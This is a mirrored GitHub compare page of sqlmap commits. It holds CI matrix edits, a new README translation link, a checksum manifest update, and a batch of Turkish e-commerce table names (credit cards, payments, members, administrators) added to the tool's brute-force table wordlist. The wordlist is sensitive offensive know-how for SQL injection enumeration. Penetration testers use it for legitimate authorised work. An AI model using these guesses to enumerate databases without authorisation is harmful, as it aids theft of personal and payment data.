mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-12-06 04:31:30 +00:00
Compare commits
65 Commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
7584a67422 | ||
|
|
2358219631 | ||
|
|
cc245a0d05 | ||
|
|
10f8b7d0e2 | ||
|
|
4b2baa32c3 | ||
|
|
935afc6217 | ||
|
|
07b94ce703 | ||
|
|
77567da54e | ||
|
|
8b3425ccdf | ||
|
|
87cd5906f9 | ||
|
|
8fc166197d | ||
|
|
7bf9e3e7b4 | ||
|
|
282eea3743 | ||
|
|
22ddd4e843 | ||
|
|
5c27dd8204 | ||
|
|
374134e8c0 | ||
|
|
db2c6bc546 | ||
|
|
9e36fd7484 | ||
|
|
944e90dad5 | ||
|
|
66d203e6ff | ||
|
|
51cdc98168 | ||
|
|
3d0390b7c6 | ||
|
|
bd23ccb507 | ||
|
|
989840c094 | ||
|
|
8dcf4baeaa | ||
|
|
bf5cddccb9 | ||
|
|
c955b034ed | ||
|
|
edb9a15538 | ||
|
|
8b55644631 | ||
|
|
238ca3ccd8 | ||
|
|
526bec322b | ||
|
|
d5527b3380 | ||
|
|
fde978c4ff | ||
|
|
1d17e2a942 | ||
|
|
79aa315344 | ||
|
|
79f4cfb0a7 | ||
|
|
3192da0acd | ||
|
|
d37db2e7e8 | ||
|
|
f1ac7dc39b | ||
|
|
9a87f47777 | ||
|
|
a79ed52463 | ||
|
|
73a62f9f4e | ||
|
|
c1af880fb8 | ||
|
|
9a48a27593 | ||
|
|
6ae0d0f54e | ||
|
|
cf91046766 | ||
|
|
0b9a8c57d7 | ||
|
|
b256269883 | ||
|
|
ebfafe93e1 | ||
|
|
2b3af64649 | ||
|
|
58c6ca3a60 | ||
|
|
59b3b973c7 | ||
|
|
e3669c0926 | ||
|
|
507c719bef | ||
|
|
3cc19816cc | ||
|
|
74ca0eda56 | ||
|
|
514a1291e4 | ||
|
|
9bbf70790c | ||
|
|
163a5f374a | ||
|
|
46cc0c2941 | ||
|
|
2f01cbf71f | ||
|
|
1e9e33d9c3 | ||
|
|
dce99e0b40 | ||
|
|
b3896f3f8c | ||
|
|
853cb3fa06 |
5
.github/workflows/tests.yml
vendored
5
.github/workflows/tests.yml
vendored
@@ -10,7 +10,10 @@ jobs:
|
||||
strategy:
|
||||
matrix:
|
||||
os: [ubuntu-latest, macos-latest, windows-latest]
|
||||
python-version: [ '3.11', 'pypy-2.7', 'pypy-3.7' ]
|
||||
python-version: [ 'pypy-2.7', '3.12' ]
|
||||
exclude:
|
||||
- os: macos-latest
|
||||
python-version: 'pypy-2.7'
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- name: Set up Python
|
||||
|
||||
@@ -65,6 +65,7 @@ Translations
|
||||
* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
|
||||
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
|
||||
* [Korean](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ko-KR.md)
|
||||
* [Kurdish (Central)](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ckb-KU.md)
|
||||
* [Persian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fa-IR.md)
|
||||
* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
|
||||
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
|
||||
|
||||
@@ -3420,6 +3420,181 @@ basvuru
|
||||
basvurular
|
||||
kontak
|
||||
kontaklar
|
||||
kisi
|
||||
kisiler
|
||||
uye
|
||||
uyeler
|
||||
kayıt
|
||||
kayıtlar
|
||||
tel
|
||||
telefon
|
||||
telefonlar
|
||||
numaralar
|
||||
numara
|
||||
kart
|
||||
kartlar
|
||||
kredi
|
||||
krediler
|
||||
kredikartı
|
||||
fiyat
|
||||
fiyatlar
|
||||
odeme
|
||||
odemeler
|
||||
kategoriler
|
||||
tbl_Uye
|
||||
xml_kategoriler
|
||||
tbl_siparis
|
||||
tbl_googlemap
|
||||
tbl_ilce
|
||||
tbl_yardim
|
||||
tbl_Resim
|
||||
tbl_anket
|
||||
tbl_Rapor
|
||||
tbl_statsvisit
|
||||
tbl_ticket
|
||||
tbl_Cesit
|
||||
tbl_xml
|
||||
tbl_Cinsiyet
|
||||
xml_urunler_temp
|
||||
tbl_takvim
|
||||
tbl_altkategori
|
||||
tbl_mesaj
|
||||
tbl_Haber
|
||||
tbl_AdresTemp
|
||||
tbl_Firma
|
||||
tbl_Medya
|
||||
xml_urunlerbirim
|
||||
tbl_Yardim
|
||||
tbl_medya
|
||||
tbl_Video
|
||||
xml_markalar_transfer
|
||||
tbl_adrestemp
|
||||
tbl_online
|
||||
tbl_sehir
|
||||
tbl_resim
|
||||
tbl_Gorsel
|
||||
tbl_doviz
|
||||
tbl_gorsel
|
||||
tbl_kampanya
|
||||
tbl_Blog
|
||||
tbl_Banners
|
||||
tbl_koleksiyon
|
||||
tbl_Galeri
|
||||
tbl_Kampanya
|
||||
tbl_Favori
|
||||
tbl_sss
|
||||
tbl_Banner
|
||||
tbl_Faq
|
||||
xml_markalar_temp
|
||||
tbl_faq
|
||||
tbl_Personel
|
||||
tbl_Seo
|
||||
tbl_adres
|
||||
tbl_ayar
|
||||
tbl_metin
|
||||
tbl_AltKategori
|
||||
tbl_kategori
|
||||
tbl_Marka
|
||||
tbl_blogkategori
|
||||
tbl_ulke
|
||||
tbl_sepetold
|
||||
tbl_yorum
|
||||
tbl_Fiyat
|
||||
tbl_Reklam
|
||||
tbl_Kategori
|
||||
tbl_Yorum
|
||||
tbl_semt
|
||||
tbl_Tedarikci
|
||||
xml_kampanyakategori
|
||||
tbl_ozelgun
|
||||
tbl_uyexml
|
||||
tbl_rapor
|
||||
tbl_seo
|
||||
tbl_Indirim
|
||||
tbl_Ilce
|
||||
tbl_bulten
|
||||
tbl_video
|
||||
tbl_Ayar
|
||||
tbl_fatura
|
||||
tbl_cinsiyet
|
||||
tbl_reklam
|
||||
tbl_sliders
|
||||
tbl_KDV
|
||||
tbl_uye_img
|
||||
tbl_siparisid
|
||||
tbl_BlogKategori
|
||||
tbl_Yonetici
|
||||
tbl_kdv
|
||||
tbl_Online
|
||||
tbl_temsilci
|
||||
tbl_Dil
|
||||
tbl_banners
|
||||
tbl_Mesaj
|
||||
tbl_Logs
|
||||
tbl_logs
|
||||
tbl_fiyat
|
||||
tbl_SSS
|
||||
tbl_Puan
|
||||
tbl_kargo
|
||||
tbl_Statsvisit
|
||||
tbl_Koleksiyon
|
||||
tbl_dil
|
||||
tbl_Sepetold
|
||||
tbl_Fatura
|
||||
tbl_yonetici
|
||||
tbl_Yazilar
|
||||
tbl_Temsilci
|
||||
tbl_Kargo
|
||||
tbl_cesit
|
||||
tbl_uye
|
||||
tbl_haber
|
||||
tbl_SiparisID
|
||||
tbl_Adres
|
||||
tbl_Ozelgun
|
||||
tbl_banka
|
||||
tbl_Videogaleri
|
||||
tbl_galeri
|
||||
tbl_videogaleri
|
||||
xml_urunresimleri
|
||||
tbl_urun
|
||||
tbl_Ticket
|
||||
tbl_yazilar
|
||||
tbl_Ulke
|
||||
tbl_Urun
|
||||
tbl_renk
|
||||
tbl_Harita
|
||||
tbl_Sepet
|
||||
tbl_Sehir
|
||||
tbl_Uye_Img
|
||||
tbl_Semt
|
||||
tbl_indirim
|
||||
xml_kampanyakategori_transfer
|
||||
tbl_Takvim
|
||||
tbl_blog
|
||||
tbl_Sliders
|
||||
tbl_Renk
|
||||
tbl_UyeXML
|
||||
tbl_tedarikci
|
||||
tbl_Fotogaleri
|
||||
tbl_Doviz
|
||||
tbl_Anket
|
||||
tbl_Banka
|
||||
tbl_Metin
|
||||
tbl_XML
|
||||
tbl_firma
|
||||
tbl_harita
|
||||
tbl_banner
|
||||
tbl_sepet
|
||||
tbl_fotogaleri
|
||||
tbl_marka
|
||||
tbl_Siparis
|
||||
tbl_personel
|
||||
tbl_puan
|
||||
tbl_Bulten
|
||||
tbl_favori
|
||||
tbl_onlineusers
|
||||
|
||||
|
||||
|
||||
# List provided by Pedrito Perez (0ark1ang3l@gmail.com)
|
||||
|
||||
|
||||
@@ -25,7 +25,7 @@ f2648a0cb4d5922d58b8aa6600f786b32324b9ac91e3a57e4ff212e901ffe151 data/shell/sta
|
||||
31676dcadde4c2eef314ef90e0661a57d2d43cb52a39ef991af43fcb6fa9af22 data/txt/common-columns.txt
|
||||
bb88fcfc8eae17865c4c25c9031d4488ef38cc43ab241c7361ae2a5df24fd0bb data/txt/common-files.txt
|
||||
e456db93a536bc3e7c1fbb6f15fbac36d6d40810c8a754b10401e0dab1ce5839 data/txt/common-outputs.txt
|
||||
504a35909572da9593fa57087caee8953cf913dfdc269959c0369a9480fd107c data/txt/common-tables.txt
|
||||
1c5095ba246934be2a7990bf11c06703f48ebba53f0dba18107fcf44e11a5cea data/txt/common-tables.txt
|
||||
4ee746dcab2e3b258aa8ff2b51b40bef2e8f7fc12c430b98d36c60880a809f03 data/txt/keywords.txt
|
||||
c5ce8ea43c32bc72255fa44d752775f8a2b2cf78541cbeaa3749d47301eb7fc6 data/txt/smalldict.txt
|
||||
895f9636ea73152d9545be1b7acaf16e0bc8695c9b46e779ab30b226d21a1221 data/txt/user-agents.txt
|
||||
@@ -75,10 +75,10 @@ c6be099a5dee34f3a7570715428add2e7419f4e73a7ce9913d3fb76eea78d88e data/udf/postg
|
||||
a7eb4d1bcbdfd155383dcd35396e2d9dd40c2e89ce9d5a02e63a95a94f0ab4ea data/xml/banner/sharepoint.xml
|
||||
e2febc92f9686eacf17a0054f175917b783cc6638ca570435a5203b03245fc18 data/xml/banner/x-aspnet-version.xml
|
||||
75672f8faa8053af0df566a48700f2178075f67c593d916313fcff3474da6f82 data/xml/banner/x-powered-by.xml
|
||||
3f9d2b3c929cacd96394d190860adc0997c9c7665020073befc69f65e5deb393 data/xml/boundaries.xml
|
||||
1ac399c49ce3cb8c0812bb246e60c8a6718226efe89ccd1f027f49a18dbeb634 data/xml/boundaries.xml
|
||||
130eef6c02dc5749f164660aa4210f75b0de35aaf2afef94b329bb1e033851f7 data/xml/errors.xml
|
||||
cfa1f0557fb71be0631796a4848d17be536e38f94571cf6ef911454fbc6b30d1 data/xml/payloads/boolean_blind.xml
|
||||
c22d076af9e8518f3b44496aee651932edf590ea4be0b328262314fcb4a52da8 data/xml/payloads/error_based.xml
|
||||
f2b711ea18f20239ba9902732631684b61106d4a4271669125a4cf41401b3eaf data/xml/payloads/error_based.xml
|
||||
b0f434f64105bd61ab0f6867b3f681b97fa02b4fb809ac538db382d031f0e609 data/xml/payloads/inline_query.xml
|
||||
0648264166455010921df1ec431e4c973809f37ef12cbfea75f95029222eb689 data/xml/payloads/stacked_queries.xml
|
||||
997556b6170964a64474a2e053abe33cf2cf029fb1acec660d4651cc67a3c7e1 data/xml/payloads/time_blind.xml
|
||||
@@ -89,13 +89,14 @@ abb6261b1c531ad2ee3ada8184c76bcdc38732558d11a8e519f36fcc95325f7e doc/AUTHORS
|
||||
2df1f15110f74ce4e52f0e7e4a605e6c7e08fbda243e444f9b60e26dfc5cf09d doc/THANKS.md
|
||||
f939c6341e3ab16b0bb9d597e4b13856c7d922be27fd8dba3aa976b347771f16 doc/THIRD-PARTY.md
|
||||
792bcf9bf7ac0696353adaf111ee643f79f1948d9b5761de9c25eb0a81a998c9 doc/translations/README-bg-BG.md
|
||||
7f48875fb5a369b8a8aaefc519722462229ce4e6c7d8f15f7777092d337e92dd doc/translations/README-ckb-KU.md
|
||||
4689fee6106207807ac31f025433b4f228470402ab67dd1e202033cf0119fc8a doc/translations/README-de-DE.md
|
||||
2b3d015709db7e42201bc89833380a2878d7ab604485ec7e26fc4de2ad5f42f0 doc/translations/README-es-MX.md
|
||||
f7b6cc0d0fdd0aa5550957db9b125a48f3fb4219bba282f49febc32a7e149e74 doc/translations/README-fa-IR.md
|
||||
3eac203d3979977b4f4257ed735df6e98ecf6c0dfcd2c42e9fea68137d40f07c doc/translations/README-fr-FR.md
|
||||
26524b18e5c4a1334a6d0de42f174b948a8c36e95f2ec1f0bc6582a14d02e692 doc/translations/README-gr-GR.md
|
||||
d505142526612a563cc71d6f99e0e3eed779221438047e224d5c36e8750961db doc/translations/README-hr-HR.md
|
||||
cb24e114a58e7f03c37f0f0ace25c6294b61308b0d60402fe5f6b2a490c40606 doc/translations/README-id-ID.md
|
||||
a381ff3047aab611cf1d09b7a15a6733773c7c475c7f402ef89e3afe8f0dd151 doc/translations/README-id-ID.md
|
||||
e88d3312a2b3891c746f6e6e57fbbd647946e2d45a5e37aab7948e371531a412 doc/translations/README-in-HI.md
|
||||
34a6a3a459dbafef1953a189def2ff798e2663db50f7b18699710d31ac0237f8 doc/translations/README-it-IT.md
|
||||
2120fd640ae5b255619abae539a4bd4a509518daeff0d758bbd61d996871282f doc/translations/README-ja-JP.md
|
||||
@@ -109,7 +110,7 @@ c94d5c9ae4e4b996eaf0d06a6c5323a12f22653bb53c5eaf5400ee0bccf4a1eb doc/translatio
|
||||
622d9a1f22d07e2fefdebbd6bd74e6727dc14725af6871423631f3d8a20a5277 doc/translations/README-sk-SK.md
|
||||
6d690c314fe278f8f949b27cd6f7db0354732c6112f2c8f764dcf7c2d12d626f doc/translations/README-tr-TR.md
|
||||
0bccce9d2e48e7acc1ef126539a50d3d83c439f94cc6387c1331a9960604a2cd doc/translations/README-uk-UA.md
|
||||
b88046e2fc27c35df58fcd5bbeaec0d70d95ebf3953f2cf29cc97a0a14dad529 doc/translations/README-vi-VN.md
|
||||
285c997e8ae7381d765143b5de6721cad598d564fd5f01a921108f285d9603a2 doc/translations/README-vi-VN.md
|
||||
b553a179c731127a115d68dfb2342602ad8558a42aa123050ba51a08509483f6 doc/translations/README-zh-CN.md
|
||||
98dd22c14c12ba65ca19efca273ef1ef07c45c7832bfd7daa7467d44cb082e76 extra/beep/beep.py
|
||||
509276140d23bfc079a6863e0291c4d0077dea6942658a992cbca7904a43fae9 extra/beep/beep.wav
|
||||
@@ -126,7 +127,7 @@ a87035e5923f5b56077dfbd18cda5aa5e2542f0707b7b55f7bbeb1960ae3cc9a extra/icmpsh/i
|
||||
12014ddddc09c58ef344659c02fd1614157cfb315575378f2c8cb90843222733 extra/icmpsh/icmpsh_m.py
|
||||
1589e5edeaf80590d4d0ce1fd12aa176730d5eba3bfd72a9f28d3a1a9353a9db extra/icmpsh/icmpsh-s.c
|
||||
ab6ee3ee9f8600e39faecfdaa11eaa3bed6f15ccef974bb904b96bf95e980c40 extra/icmpsh/__init__.py
|
||||
ce1dd60916a926081ac7e7c57bd3c6856b80c029c4e8687528b18ce47dbec5b4 extra/icmpsh/README.txt
|
||||
27af6b7ec0f689e148875cb62c3acb4399d3814ba79908220b29e354a8eed4b8 extra/icmpsh/README.txt
|
||||
99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730 extra/__init__.py
|
||||
191e3e397b83294082022de178f977f2c59fa99c96e5053375f6c16114d6777e extra/runcmd/README.txt
|
||||
25be5af53911f8c4816c0c8996b5b4932543efd6be247f5e18ce936679e7d1cd extra/runcmd/runcmd.exe_
|
||||
@@ -153,19 +154,19 @@ dc35b51f5c9347eda8130106ee46bb051474fc0c5ed101f84abf3e546f729ceb extra/shutils/
|
||||
fa1a42d189188770e82d536821d694626ca854438dadb9e08e143d3ece8c7e27 extra/shutils/pydiatra.sh
|
||||
5da7d1c86ca93313477d1deb0d6d4490798a2b63a2dd8729094184625b971e11 extra/shutils/pyflakes.sh
|
||||
c941be05376ba0a99d329e6de60e3b06b3fb261175070da6b1fc073d3afd5281 extra/shutils/pylint.sh
|
||||
bc2ceff560d11d696329bd976b14fbd8cddf428ad9f95eeb0a8f53e1afdc998b extra/shutils/pypi.sh
|
||||
a19725f10ff9c5d484cffd8f1bd9348918cc3c4bfdd4ba6fffb42aaf0f5c973c extra/shutils/pypi.sh
|
||||
df768bcb9838dc6c46dab9b4a877056cb4742bd6cfaaf438c4a3712c5cc0d264 extra/shutils/recloak.sh
|
||||
1972990a67caf2d0231eacf60e211acf545d9d0beeb3c145a49ba33d5d491b3f extra/shutils/strip.sh
|
||||
99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730 extra/vulnserver/__init__.py
|
||||
2ffe028b8b21306b6f528e62b214f43172fcf5bb59d317a13ba78e70155677ce extra/vulnserver/vulnserver.py
|
||||
f9c96cd3fe99578bed9d49a8bdf8d76836d320a7c48c56eb0469f48b36775c35 lib/controller/action.py
|
||||
5d62d04edd432834df809707450a42778768ccc3c909eef6c6738ee780ffa884 lib/controller/checks.py
|
||||
34120f3ea85f4d69211642a263f963f08c97c20d47fd2ca082c23a5336d393f8 lib/controller/controller.py
|
||||
062c02a876644fc9bb4be37b545a325c600ee0b62f898f9723676043303659d4 lib/controller/checks.py
|
||||
11c494dd61fc8259d5f9e60bd69c4169025980a4ce948c6622275179393e9bef lib/controller/controller.py
|
||||
46d70b69cc7af0849242da5094a644568d7662a256a63e88ae485985b6dccf12 lib/controller/handler.py
|
||||
99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730 lib/controller/__init__.py
|
||||
826c33f1105be4c0985e1bbe1d75bdb009c17815ad6552fc8d9bf39090d3c40f lib/core/agent.py
|
||||
b2d69c99632da5c2acd0c0934e70d55862f1380a3f602cbe7456d617fb9c1fc9 lib/core/bigarray.py
|
||||
ba3f0002aa93f8f21f06dbea343573c590b9e6ec160fc6668c15e68a970cfb12 lib/core/common.py
|
||||
c2966ee914b98ba55c0e12b8f76e678245d08ff9b30f63c4456721ec3eff3918 lib/core/bigarray.py
|
||||
d4d550f55b9eb8c3a812e19f46319fb299b3d9549df54d5d14fc615aeaa38b0e lib/core/common.py
|
||||
5c26b0f308266bc3a9679ef837439e38d1dc7a69eac6bd3422280f49aaf114d2 lib/core/compat.py
|
||||
b60c96780cad4a257f91a0611b08cfcc52f242908c5d5ab2bf9034ef07869602 lib/core/convert.py
|
||||
5e381515873e71c395c77df00bf1dd8c4592afc6210a2f75cbc20daf384e539f lib/core/data.py
|
||||
@@ -180,18 +181,18 @@ e8f6f1df8814b7b03c3eba22901837555083f66c99ee93b943911de785736bfa lib/core/dicts
|
||||
99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730 lib/core/__init__.py
|
||||
fce3fd4b161ec1c6e9d5bf1dca5bc4083e07d616ed2c14b798e96b60ec67c2b2 lib/core/log.py
|
||||
4caebf27d203673b8ad32394937397319f606c4e1f1e1a2a221402d39c644b40 lib/core/optiondict.py
|
||||
33e0ec9ed38ae1ac74f1e2e3a1a246dee44c167723c9df69635793bfdbd971df lib/core/option.py
|
||||
fdce95c552a097bf0dd44e5d6be2204c4c458d490e62c4d9d68fca5e2dc37c48 lib/core/patch.py
|
||||
c727cf637840aa5c0970c45d27bb5b0d077751aee10a5cd467caf92a54a211f4 lib/core/option.py
|
||||
d2d81ee7520b55571923461a2bdfaa68dda74a89846761338408ab0acf08d3a5 lib/core/patch.py
|
||||
bf77f9fc4296f239687297aee1fd6113b34f855965a6f690b52e26bd348cb353 lib/core/profiling.py
|
||||
4ccce0d53f467166d4084c9ef53a07f54cc352e75f785454a31c8a820511a84e lib/core/readlineng.py
|
||||
4eff81c639a72b261c8ba1c876a01246e718e6626e8e77ae9cc6298b20a39355 lib/core/replication.py
|
||||
bbd1dcda835934728efc6d68686e9b0da72b09b3ee38f3c0ab78e8c18b0ba726 lib/core/revision.py
|
||||
eed6b0a21b3e69c5583133346b0639dc89937bd588887968ee85f8389d7c3c96 lib/core/session.py
|
||||
8c56685dbca6414a9b3c1dcc45249d41ab4677635edd8a5a68cc8ef5504d39da lib/core/settings.py
|
||||
85fbc4937c4770c8ff41ebfff13abfcdbc1fda52fab8ce05568b3f6309bd4b35 lib/core/settings.py
|
||||
2bec97d8a950f7b884e31dfe9410467f00d24f21b35672b95f8d68ed59685fd4 lib/core/shell.py
|
||||
e90a359b37a55c446c60e70ccd533f87276714d0b09e34f69b0740fd729ddbf8 lib/core/subprocessng.py
|
||||
54f7c70b4c7a9931f7ff3c1c12030180bde38e35a306d5e343ad6052919974cd lib/core/target.py
|
||||
5941a7a641ea58b1d9e59ab3c9f4e9e40566ba08842e1cadb51ea8df9faf763f lib/core/testing.py
|
||||
6d6a89be3746f07644b96c2c212745515fa43eab4d1bd0aecf1476249b1c7f07 lib/core/testing.py
|
||||
8cb7424aa9d42d028a6780250effe4e719d9bb35558057f8ebe9e32408a6b80f lib/core/threads.py
|
||||
ff39235aee7e33498c66132d17e6e86e7b8a29754e3fdecd880ca8356b17f791 lib/core/unescaper.py
|
||||
2984e4973868f586aa932f00da684bf31718c0331817c9f8721acd71fd661f89 lib/core/update.py
|
||||
@@ -199,7 +200,7 @@ ce65f9e8e1c726de3cec6abf31a2ffdbc16c251f772adcc14f67dee32d0f6b57 lib/core/wordl
|
||||
99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730 lib/__init__.py
|
||||
ba16fdd71fba31990dc92ff5a7388fb0ebac21ca905c314be6c8c2b868f94ab7 lib/parse/banner.py
|
||||
d757343f241b14e23aefb2177b6c2598f1bc06253fd93b0d8a28d4a55c267100 lib/parse/cmdline.py
|
||||
bcf0b32a730f1cdf097b00acf220eb216bc8eb4cb5d217a4a0d6ebe9f8086129 lib/parse/configfile.py
|
||||
d1fa3b9457f0e934600519309cbd3d84f9e6158a620866e7b352078c7c136f01 lib/parse/configfile.py
|
||||
9af4c86e41e50bd6055573a7b76e380a6658b355320c72dd6d2d5ddab14dc082 lib/parse/handler.py
|
||||
13b3ab678a2c422ce1dea9558668c05e562c0ec226f36053259a0be7280ebf92 lib/parse/headers.py
|
||||
b48edf3f30db127b18419f607894d5de46fc949d14c65fdc85ece524207d6dfd lib/parse/html.py
|
||||
@@ -207,15 +208,15 @@ b48edf3f30db127b18419f607894d5de46fc949d14c65fdc85ece524207d6dfd lib/parse/html
|
||||
8743332261f8b0da52c94ca56510f0f2e856431c2bbe2164efdd3de605c2802b lib/parse/payloads.py
|
||||
23adb7169e99554708062ff87ae795b90c6a284d1b5159eada974bf9f8d7583f lib/parse/sitemap.py
|
||||
0acfa7da4b0dbc81652b018c3fdbb42512c8d7d5f01bbf9aef18e5ea7d38107a lib/request/basicauthhandler.py
|
||||
c8446d4a50f06a50d7db18adc04c321e12cd2d0fa8b04bd58306511c89823316 lib/request/basic.py
|
||||
2395d6d28d6a1e342fccd56bb741080468a777b9b2a5ddd5634df65fe9785cef lib/request/basic.py
|
||||
ead55e936dfc8941e512c8e8a4f644689387f331f4eed97854c558be3e227a91 lib/request/chunkedhandler.py
|
||||
06128c4e3e0e1fe34618de9d1fd5ee21292953dce4a3416567e200d2dfda79f2 lib/request/comparison.py
|
||||
00b23e22a65889829f4ffe65eea5e2bd5cf6ceab4f9b0f32b05047335b0b4a3e lib/request/connect.py
|
||||
9ffc0e799273240c26d32521f58b3e3fd8a3c834e9db2ce3bda460595e6be6c8 lib/request/connect.py
|
||||
470e96857a7037a2d74b2c4b1c8c5d8379b76ea8cbdb1d8dd4367a7a852fa93c lib/request/direct.py
|
||||
e802cc9099282764da0280172623600b6b9bb9fe1c87f352ade8be7a3f622585 lib/request/dns.py
|
||||
226226c2b8c906e0d0612ea68404c7f266e7a6685e0bf233e5456e10625b012d lib/request/httpshandler.py
|
||||
9922275d3ca79f00f9b9301f4e4d9f1c444dc7ac38de6d50ef253122abae4833 lib/request/httpshandler.py
|
||||
99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730 lib/request/__init__.py
|
||||
6944e07e5c061afea30494bcea5198c67b86dda1f291b80e75cb1f121490f1a7 lib/request/inject.py
|
||||
ea8261a5099ca66032ae7606e5392de719827a71750c203e3fc6bb6759757cf3 lib/request/inject.py
|
||||
ba87a7bc91c1ec99a273284b9d0363358339aab0220651ff1ceddf3737ce2436 lib/request/methodrequest.py
|
||||
4ba939b6b9a130cd185e749c585afa2c4c8a5dbcbf8216ecc4f3199fe001b3e2 lib/request/pkihandler.py
|
||||
c6b222c0d34313cdea82fb39c8ead5d658400bf41e56aabd9640bdcf9bedc3a1 lib/request/rangehandler.py
|
||||
@@ -224,7 +225,7 @@ c6b222c0d34313cdea82fb39c8ead5d658400bf41e56aabd9640bdcf9bedc3a1 lib/request/ra
|
||||
f07a4e40819dc2e7920f9291424761971a9769e4acfd34da223f24717563193c lib/takeover/abstraction.py
|
||||
e775a0abe52c1a204c484ef212ff135c857cc8b7e2c94da23b5624c561ec4b9e lib/takeover/icmpsh.py
|
||||
99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730 lib/takeover/__init__.py
|
||||
d7ef25256e5f69b5a54569ad8b87ffa2045b5ed678e5bfbcea75136c0201b034 lib/takeover/metasploit.py
|
||||
c3d8c98a6d44d392f7b8572d3b35804f85838ddbc8e2a2f57af58f8e598af2f4 lib/takeover/metasploit.py
|
||||
a31b1bf60fcf58b7b735a64d73335212d5089e84051ff7883c14f6c73e055643 lib/takeover/registry.py
|
||||
90655344c9968e841eb809845e30da8cc60160390911345ac873be39d270467f lib/takeover/udf.py
|
||||
145a9a8b7afb6504700faa1c61ca18eabab3253951788f29e7ee63c3ebff0e48 lib/takeover/web.py
|
||||
@@ -239,9 +240,9 @@ f948fefb0fa67da8cf037f7abbcdbb740148babda9ad8a58fab1693456834817 lib/techniques
|
||||
99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730 lib/techniques/__init__.py
|
||||
99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730 lib/techniques/union/__init__.py
|
||||
700cc5e8cae85bd86674d0cb6c97093fde2c52a480cc1e40ae0010fffd649395 lib/techniques/union/test.py
|
||||
4252a1829e60bb9a69e3927bf68a320976b8ef637804b7032d7497699f2e89e7 lib/techniques/union/use.py
|
||||
74ecbeff52a6fba83fc2c93612afd8befdbdc0c25566d31e5d20fbbc5b895054 lib/techniques/union/use.py
|
||||
6b3f83a85c576830783a64e943a58e90b1f25e9e24cd51ae12b1d706796124e9 lib/utils/api.py
|
||||
1d4d1e49a0897746d4ad64316d4d777f4804c4c11e349e9eb3844130183d4887 lib/utils/brute.py
|
||||
e00740b9a4c997152fa8b00d3f0abf45ae15e23c33a92966eaa658fde83c586f lib/utils/brute.py
|
||||
c0a4765aa80c5d9b7ef1abe93401a78dd45b2766a1f4ff6286287dc6188294de lib/utils/crawler.py
|
||||
3f97e327c548d8b5d74fda96a2a0d1b2933b289b9ec2351b06c91cefdd38629d lib/utils/deps.py
|
||||
e81393f0d077578e6dcd3db2887e93ac2bfbdef2ce87686e83236a36112ca7d3 lib/utils/getch.py
|
||||
@@ -285,7 +286,7 @@ c90d520338946dfae7b934bb3aab9bf8db720d4092cadd5ae825979d2665264e plugins/dbms/a
|
||||
e0d2522dc664a7da0c9a32a34e052b473a0f3ebb46c86e9cea92a5f7e9ab33b0 plugins/dbms/clickhouse/connector.py
|
||||
4b6418c435fa69423857a525d38705666a27ecf6edd66527e51af46561ead621 plugins/dbms/clickhouse/enumeration.py
|
||||
d70dc313dac1047c9bb8e1d1264f17fa6e03f0d0dfeb8692c4dcec2c394a64bc plugins/dbms/clickhouse/filesystem.py
|
||||
9cc7352863a1215127e21a54fc67cc930ecd6983eb3d617d36dbebaf8c576e11 plugins/dbms/clickhouse/fingerprint.py
|
||||
7d6278c7fe14fd15c7ed8d2aee5e66f1ab76bea9f4b0c75f2ae9137ddbda236b plugins/dbms/clickhouse/fingerprint.py
|
||||
9af365a8a570a22b43ca050ce280da49d0a413e261cc7f190a49336857ac026e plugins/dbms/clickhouse/__init__.py
|
||||
695a7c428c478082072d05617b7f11d24c79b90ca3c117819258ef0dbdf290a5 plugins/dbms/clickhouse/syntax.py
|
||||
ec61ff0bb44e85dc9c9df8c9b466769c5a5791c9f1ffb944fdc3b1b7ef02d0d5 plugins/dbms/clickhouse/takeover.py
|
||||
@@ -398,11 +399,11 @@ fdc3effe9320197795137dedb58e46c0409f19649889177443a2cbf58787c0dd plugins/dbms/m
|
||||
7f0165c085b0cb7d168d86acb790741c7ba12ad01ca9edf7972cfb184adb3ee9 plugins/dbms/mysql/connector.py
|
||||
05c4624b2729f13af2dd19286fc9276fc97c0f1ff19a31255785b7581fc232ae plugins/dbms/mysql/enumeration.py
|
||||
9915fd436ea1783724b4fe12ea1d68fc3b838c37684a2c6dd01d53c739a1633f plugins/dbms/mysql/filesystem.py
|
||||
ada995d6633ea737e8f12ba4a569ecb1bae9ffe7928c47ed0235f9de2d96f263 plugins/dbms/mysql/fingerprint.py
|
||||
6114337620d824bf061abee8bcfe6e52aea38a54ee437f1cfff92a9a2097c6a7 plugins/dbms/mysql/fingerprint.py
|
||||
ae824d447c1a59d055367aa9180acb42f7bb10df0006d4f99eeb12e43af563ae plugins/dbms/mysql/__init__.py
|
||||
60fc1c647e31df191af2edfd26f99bf739fec53d3a8e1beb3bffdcf335c781fe plugins/dbms/mysql/syntax.py
|
||||
784c31c2c0e19feb88bf5d21bfc7ae4bf04291922e40830da677577c5d5b4598 plugins/dbms/mysql/takeover.py
|
||||
6ae43c1d1a03f2e7a5c59890662f7609ebfd9ab7c26efb6ece85ae595335790e plugins/dbms/oracle/connector.py
|
||||
477d23978640da2c6529a7b2d2cb4b19a09dedc83960d222ad12a0f2434fb289 plugins/dbms/oracle/connector.py
|
||||
